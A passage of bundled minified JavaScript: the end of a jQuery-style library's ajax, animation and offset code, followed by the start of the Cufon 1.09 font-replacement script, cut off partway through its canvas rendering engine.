function(){try{return new z.ActiveXObject("Microsoft.XMLHTTP")}catch(a){}},accepts:{xml:"application/xml, text/xml",html:"text/html",script:"text/javascript, application/javascript",json:"application/json, text/javascript",text:"text/plain",_default:"*/*"}},lastModified:{},etag:{},ajax:function(a){function b(){e.success&&e.success.call(o,n,j,w);e.global&&f("ajaxSuccess",[w,e])}function d(){e.complete&&e.complete.call(o,w,j);e.global&&f("ajaxComplete",[w,e]);e.global&&!--c.active&&c.event.trigger("ajaxStop")}
function f(q,p){(e.context?c(e.context):c.event).trigger(q,p)}var e=c.extend(true,{},c.ajaxSettings,a),i,j,n,o=a&&a.context||e,m=e.type.toUpperCase();if(e.data&&e.processData&&typeof e.data!=="string")e.data=c.param(e.data,e.traditional);if(e.dataType==="jsonp"){if(m==="GET")N.test(e.url)||(e.url+=(ja.test(e.url)?"&":"?")+(e.jsonp||"callback")+"=?");else if(!e.data||!N.test(e.data))e.data=(e.data?e.data+"&":"")+(e.jsonp||"callback")+"=?";e.dataType="json"}if(e.dataType==="json"&&(e.data&&N.test(e.data)||
N.test(e.url))){i=e.jsonpCallback||"jsonp"+pb++;if(e.data)e.data=(e.data+"").replace(N,"="+i+"$1");e.url=e.url.replace(N,"="+i+"$1");e.dataType="script";z[i]=z[i]||function(q){n=q;b();d();z[i]=v;try{delete z[i]}catch(p){}A&&A.removeChild(B)}}if(e.dataType==="script"&&e.cache===null)e.cache=false;if(e.cache===false&&m==="GET"){var s=J(),x=e.url.replace(tb,"$1_="+s+"$2");e.url=x+(x===e.url?(ja.test(e.url)?"&":"?")+"_="+s:"")}if(e.data&&m==="GET")e.url+=(ja.test(e.url)?"&":"?")+e.data;e.global&&!c.active++&&
c.event.trigger("ajaxStart");s=(s=ub.exec(e.url))&&(s[1]&&s[1]!==location.protocol||s[2]!==location.host);if(e.dataType==="script"&&m==="GET"&&s){var A=r.getElementsByTagName("head")[0]||r.documentElement,B=r.createElement("script");B.src=e.url;if(e.scriptCharset)B.charset=e.scriptCharset;if(!i){var C=false;B.onload=B.onreadystatechange=function(){if(!C&&(!this.readyState||this.readyState==="loaded"||this.readyState==="complete")){C=true;b();d();B.onload=B.onreadystatechange=null;A&&B.parentNode&&
A.removeChild(B)}}}A.insertBefore(B,A.firstChild);return v}var E=false,w=e.xhr();if(w){e.username?w.open(m,e.url,e.async,e.username,e.password):w.open(m,e.url,e.async);try{if(e.data||a&&a.contentType)w.setRequestHeader("Content-Type",e.contentType);if(e.ifModified){c.lastModified[e.url]&&w.setRequestHeader("If-Modified-Since",c.lastModified[e.url]);c.etag[e.url]&&w.setRequestHeader("If-None-Match",c.etag[e.url])}s||w.setRequestHeader("X-Requested-With","XMLHttpRequest");w.setRequestHeader("Accept",
e.dataType&&e.accepts[e.dataType]?e.accepts[e.dataType]+", */*":e.accepts._default)}catch(fa){}if(e.beforeSend&&e.beforeSend.call(o,w,e)===false){e.global&&!--c.active&&c.event.trigger("ajaxStop");w.abort();return false}e.global&&f("ajaxSend",[w,e]);var g=w.onreadystatechange=function(q){if(!w||w.readyState===0||q==="abort"){E||d();E=true;if(w)w.onreadystatechange=c.noop}else if(!E&&w&&(w.readyState===4||q==="timeout")){E=true;w.onreadystatechange=c.noop;j=q==="timeout"?"timeout":!c.httpSuccess(w)?
"error":e.ifModified&&c.httpNotModified(w,e.url)?"notmodified":"success";var p;if(j==="success")try{n=c.httpData(w,e.dataType,e)}catch(u){j="parsererror";p=u}if(j==="success"||j==="notmodified")i||b();else c.handleError(e,w,j,p);d();q==="timeout"&&w.abort();if(e.async)w=null}};try{var h=w.abort;w.abort=function(){w&&h.call(w);g("abort")}}catch(k){}e.async&&e.timeout>0&&setTimeout(function(){w&&!E&&g("timeout")},e.timeout);try{w.send(m==="POST"||m==="PUT"||m==="DELETE"?e.data:null)}catch(l){c.handleError(e,
w,null,l);d()}e.async||g();return w}},handleError:function(a,b,d,f){if(a.error)a.error.call(a.context||a,b,d,f);if(a.global)(a.context?c(a.context):c.event).trigger("ajaxError",[b,a,f])},active:0,httpSuccess:function(a){try{return!a.status&&location.protocol==="file:"||a.status>=200&&a.status<300||a.status===304||a.status===1223||a.status===0}catch(b){}return false},httpNotModified:function(a,b){var d=a.getResponseHeader("Last-Modified"),f=a.getResponseHeader("Etag");if(d)c.lastModified[b]=d;if(f)c.etag[b]=
f;return a.status===304||a.status===0},httpData:function(a,b,d){var f=a.getResponseHeader("content-type")||"",e=b==="xml"||!b&&f.indexOf("xml")>=0;a=e?a.responseXML:a.responseText;e&&a.documentElement.nodeName==="parsererror"&&c.error("parsererror");if(d&&d.dataFilter)a=d.dataFilter(a,b);if(typeof a==="string")if(b==="json"||!b&&f.indexOf("json")>=0)a=c.parseJSON(a);else if(b==="script"||!b&&f.indexOf("javascript")>=0)c.globalEval(a);return a},param:function(a,b){function d(j,n){if(c.isArray(n))c.each(n,
function(o,m){b?f(j,m):d(j+"["+(typeof m==="object"||c.isArray(m)?o:"")+"]",m)});else!b&&n!=null&&typeof n==="object"?c.each(n,function(o,m){d(j+"["+o+"]",m)}):f(j,n)}function f(j,n){n=c.isFunction(n)?n():n;e[e.length]=encodeURIComponent(j)+"="+encodeURIComponent(n)}var e=[];if(b===v)b=c.ajaxSettings.traditional;if(c.isArray(a)||a.jquery)c.each(a,function(){f(this.name,this.value)});else for(var i in a)d(i,a[i]);return e.join("&").replace(vb,"+")}});var ka={},wb=/toggle|show|hide/,xb=/^([+-]=)?([\d+-.]+)(.*)$/,
W,ta=[["height","marginTop","marginBottom","paddingTop","paddingBottom"],["width","marginLeft","marginRight","paddingLeft","paddingRight"],["opacity"]];c.fn.extend({show:function(a,b){if(a||a===0)return this.animate(K("show",3),a,b);else{a=0;for(b=this.length;a<b;a++){var d=c.data(this[a],"olddisplay");this[a].style.display=d||"";if(c.css(this[a],"display")==="none"){d=this[a].nodeName;var f;if(ka[d])f=ka[d];else{var e=c("<"+d+" />").appendTo("body");f=e.css("display");if(f==="none")f="block";e.remove();
ka[d]=f}c.data(this[a],"olddisplay",f)}}a=0;for(b=this.length;a<b;a++)this[a].style.display=c.data(this[a],"olddisplay")||"";return this}},hide:function(a,b){if(a||a===0)return this.animate(K("hide",3),a,b);else{a=0;for(b=this.length;a<b;a++){var d=c.data(this[a],"olddisplay");!d&&d!=="none"&&c.data(this[a],"olddisplay",c.css(this[a],"display"))}a=0;for(b=this.length;a<b;a++)this[a].style.display="none";return this}},_toggle:c.fn.toggle,toggle:function(a,b){var d=typeof a==="boolean";if(c.isFunction(a)&&
c.isFunction(b))this._toggle.apply(this,arguments);else a==null||d?this.each(function(){var f=d?a:c(this).is(":hidden");c(this)[f?"show":"hide"]()}):this.animate(K("toggle",3),a,b);return this},fadeTo:function(a,b,d){return this.filter(":hidden").css("opacity",0).show().end().animate({opacity:b},a,d)},animate:function(a,b,d,f){var e=c.speed(b,d,f);if(c.isEmptyObject(a))return this.each(e.complete);return this[e.queue===false?"each":"queue"](function(){var i=c.extend({},e),j,n=this.nodeType===1&&c(this).is(":hidden"),
o=this;for(j in a){var m=j.replace(ha,ia);if(j!==m){a[m]=a[j];delete a[j];j=m}if(a[j]==="hide"&&n||a[j]==="show"&&!n)return i.complete.call(this);if((j==="height"||j==="width")&&this.style){i.display=c.css(this,"display");i.overflow=this.style.overflow}if(c.isArray(a[j])){(i.specialEasing=i.specialEasing||{})[j]=a[j][1];a[j]=a[j][0]}}if(i.overflow!=null)this.style.overflow="hidden";i.curAnim=c.extend({},a);c.each(a,function(s,x){var A=new c.fx(o,i,s);if(wb.test(x))A[x==="toggle"?n?"show":"hide":x](a);
else{var B=xb.exec(x),C=A.cur(true)||0;if(B){x=parseFloat(B[2]);var E=B[3]||"px";if(E!=="px"){o.style[s]=(x||1)+E;C=(x||1)/A.cur(true)*C;o.style[s]=C+E}if(B[1])x=(B[1]==="-="?-1:1)*x+C;A.custom(C,x,E)}else A.custom(C,x,"")}});return true})},stop:function(a,b){var d=c.timers;a&&this.queue([]);this.each(function(){for(var f=d.length-1;f>=0;f--)if(d[f].elem===this){b&&d[f](true);d.splice(f,1)}});b||this.dequeue();return this}});c.each({slideDown:K("show",1),slideUp:K("hide",1),slideToggle:K("toggle",
1),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"}},function(a,b){c.fn[a]=function(d,f){return this.animate(b,d,f)}});c.extend({speed:function(a,b,d){var f=a&&typeof a==="object"?a:{complete:d||!d&&b||c.isFunction(a)&&a,duration:a,easing:d&&b||b&&!c.isFunction(b)&&b};f.duration=c.fx.off?0:typeof f.duration==="number"?f.duration:c.fx.speeds[f.duration]||c.fx.speeds._default;f.old=f.complete;f.complete=function(){f.queue!==false&&c(this).dequeue();c.isFunction(f.old)&&f.old.call(this)};return f},easing:{linear:function(a,
b,d,f){return d+f*a},swing:function(a,b,d,f){return(-Math.cos(a*Math.PI)/2+0.5)*f+d}},timers:[],fx:function(a,b,d){this.options=b;this.elem=a;this.prop=d;if(!b.orig)b.orig={}}});c.fx.prototype={update:function(){this.options.step&&this.options.step.call(this.elem,this.now,this);(c.fx.step[this.prop]||c.fx.step._default)(this);if((this.prop==="height"||this.prop==="width")&&this.elem.style)this.elem.style.display="block"},cur:function(a){if(this.elem[this.prop]!=null&&(!this.elem.style||this.elem.style[this.prop]==
null))return this.elem[this.prop];return(a=parseFloat(c.css(this.elem,this.prop,a)))&&a>-10000?a:parseFloat(c.curCSS(this.elem,this.prop))||0},custom:function(a,b,d){function f(i){return e.step(i)}this.startTime=J();this.start=a;this.end=b;this.unit=d||this.unit||"px";this.now=this.start;this.pos=this.state=0;var e=this;f.elem=this.elem;if(f()&&c.timers.push(f)&&!W)W=setInterval(c.fx.tick,13)},show:function(){this.options.orig[this.prop]=c.style(this.elem,this.prop);this.options.show=true;this.custom(this.prop===
"width"||this.prop==="height"?1:0,this.cur());c(this.elem).show()},hide:function(){this.options.orig[this.prop]=c.style(this.elem,this.prop);this.options.hide=true;this.custom(this.cur(),0)},step:function(a){var b=J(),d=true;if(a||b>=this.options.duration+this.startTime){this.now=this.end;this.pos=this.state=1;this.update();this.options.curAnim[this.prop]=true;for(var f in this.options.curAnim)if(this.options.curAnim[f]!==true)d=false;if(d){if(this.options.display!=null){this.elem.style.overflow=
this.options.overflow;a=c.data(this.elem,"olddisplay");this.elem.style.display=a?a:this.options.display;if(c.css(this.elem,"display")==="none")this.elem.style.display="block"}this.options.hide&&c(this.elem).hide();if(this.options.hide||this.options.show)for(var e in this.options.curAnim)c.style(this.elem,e,this.options.orig[e]);this.options.complete.call(this.elem)}return false}else{e=b-this.startTime;this.state=e/this.options.duration;a=this.options.easing||(c.easing.swing?"swing":"linear");this.pos=
c.easing[this.options.specialEasing&&this.options.specialEasing[this.prop]||a](this.state,e,0,1,this.options.duration);this.now=this.start+(this.end-this.start)*this.pos;this.update()}return true}};c.extend(c.fx,{tick:function(){for(var a=c.timers,b=0;b<a.length;b++)a[b]()||a.splice(b--,1);a.length||c.fx.stop()},stop:function(){clearInterval(W);W=null},speeds:{slow:600,fast:200,_default:400},step:{opacity:function(a){c.style(a.elem,"opacity",a.now)},_default:function(a){if(a.elem.style&&a.elem.style[a.prop]!=
null)a.elem.style[a.prop]=(a.prop==="width"||a.prop==="height"?Math.max(0,a.now):a.now)+a.unit;else a.elem[a.prop]=a.now}}});if(c.expr&&c.expr.filters)c.expr.filters.animated=function(a){return c.grep(c.timers,function(b){return a===b.elem}).length};c.fn.offset="getBoundingClientRect"in r.documentElement?function(a){var b=this[0];if(a)return this.each(function(e){c.offset.setOffset(this,a,e)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return c.offset.bodyOffset(b);var d=b.getBoundingClientRect(),
f=b.ownerDocument;b=f.body;f=f.documentElement;return{top:d.top+(self.pageYOffset||c.support.boxModel&&f.scrollTop||b.scrollTop)-(f.clientTop||b.clientTop||0),left:d.left+(self.pageXOffset||c.support.boxModel&&f.scrollLeft||b.scrollLeft)-(f.clientLeft||b.clientLeft||0)}}:function(a){var b=this[0];if(a)return this.each(function(s){c.offset.setOffset(this,a,s)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return c.offset.bodyOffset(b);c.offset.initialize();var d=b.offsetParent,f=
b,e=b.ownerDocument,i,j=e.documentElement,n=e.body;f=(e=e.defaultView)?e.getComputedStyle(b,null):b.currentStyle;for(var o=b.offsetTop,m=b.offsetLeft;(b=b.parentNode)&&b!==n&&b!==j;){if(c.offset.supportsFixedPosition&&f.position==="fixed")break;i=e?e.getComputedStyle(b,null):b.currentStyle;o-=b.scrollTop;m-=b.scrollLeft;if(b===d){o+=b.offsetTop;m+=b.offsetLeft;if(c.offset.doesNotAddBorder&&!(c.offset.doesAddBorderForTableAndCells&&/^t(able|d|h)$/i.test(b.nodeName))){o+=parseFloat(i.borderTopWidth)||
0;m+=parseFloat(i.borderLeftWidth)||0}f=d;d=b.offsetParent}if(c.offset.subtractsBorderForOverflowNotVisible&&i.overflow!=="visible"){o+=parseFloat(i.borderTopWidth)||0;m+=parseFloat(i.borderLeftWidth)||0}f=i}if(f.position==="relative"||f.position==="static"){o+=n.offsetTop;m+=n.offsetLeft}if(c.offset.supportsFixedPosition&&f.position==="fixed"){o+=Math.max(j.scrollTop,n.scrollTop);m+=Math.max(j.scrollLeft,n.scrollLeft)}return{top:o,left:m}};c.offset={initialize:function(){var a=r.body,b=r.createElement("div"),
d,f,e,i=parseFloat(c.curCSS(a,"marginTop",true))||0;c.extend(b.style,{position:"absolute",top:0,left:0,margin:0,border:0,width:"1px",height:"1px",visibility:"hidden"});b.innerHTML="<div style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;'><div></div></div><table style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;' cellpadding='0' cellspacing='0'><tr><td></td></tr></table>";a.insertBefore(b,a.firstChild);
d=b.firstChild;f=d.firstChild;e=d.nextSibling.firstChild.firstChild;this.doesNotAddBorder=f.offsetTop!==5;this.doesAddBorderForTableAndCells=e.offsetTop===5;f.style.position="fixed";f.style.top="20px";this.supportsFixedPosition=f.offsetTop===20||f.offsetTop===15;f.style.position=f.style.top="";d.style.overflow="hidden";d.style.position="relative";this.subtractsBorderForOverflowNotVisible=f.offsetTop===-5;this.doesNotIncludeMarginInBodyOffset=a.offsetTop!==i;a.removeChild(b);c.offset.initialize=c.noop},
bodyOffset:function(a){var b=a.offsetTop,d=a.offsetLeft;c.offset.initialize();if(c.offset.doesNotIncludeMarginInBodyOffset){b+=parseFloat(c.curCSS(a,"marginTop",true))||0;d+=parseFloat(c.curCSS(a,"marginLeft",true))||0}return{top:b,left:d}},setOffset:function(a,b,d){if(/static/.test(c.curCSS(a,"position")))a.style.position="relative";var f=c(a),e=f.offset(),i=parseInt(c.curCSS(a,"top",true),10)||0,j=parseInt(c.curCSS(a,"left",true),10)||0;if(c.isFunction(b))b=b.call(a,d,e);d={top:b.top-e.top+i,left:b.left-
e.left+j};"using"in b?b.using.call(a,d):f.css(d)}};c.fn.extend({position:function(){if(!this[0])return null;var a=this[0],b=this.offsetParent(),d=this.offset(),f=/^body|html$/i.test(b[0].nodeName)?{top:0,left:0}:b.offset();d.top-=parseFloat(c.curCSS(a,"marginTop",true))||0;d.left-=parseFloat(c.curCSS(a,"marginLeft",true))||0;f.top+=parseFloat(c.curCSS(b[0],"borderTopWidth",true))||0;f.left+=parseFloat(c.curCSS(b[0],"borderLeftWidth",true))||0;return{top:d.top-f.top,left:d.left-f.left}},offsetParent:function(){return this.map(function(){for(var a=
this.offsetParent||r.body;a&&!/^body|html$/i.test(a.nodeName)&&c.css(a,"position")==="static";)a=a.offsetParent;return a})}});c.each(["Left","Top"],function(a,b){var d="scroll"+b;c.fn[d]=function(f){var e=this[0],i;if(!e)return null;if(f!==v)return this.each(function(){if(i=ua(this))i.scrollTo(!a?f:c(i).scrollLeft(),a?f:c(i).scrollTop());else this[d]=f});else return(i=ua(e))?"pageXOffset"in i?i[a?"pageYOffset":"pageXOffset"]:c.support.boxModel&&i.document.documentElement[d]||i.document.body[d]:e[d]}});
c.each(["Height","Width"],function(a,b){var d=b.toLowerCase();c.fn["inner"+b]=function(){return this[0]?c.css(this[0],d,false,"padding"):null};c.fn["outer"+b]=function(f){return this[0]?c.css(this[0],d,false,f?"margin":"border"):null};c.fn[d]=function(f){var e=this[0];if(!e)return f==null?null:this;if(c.isFunction(f))return this.each(function(i){var j=c(this);j[d](f.call(this,i,j[d]()))});return"scrollTo"in e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||
e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===v?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});z.jQuery=z.$=c})(window);
/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var 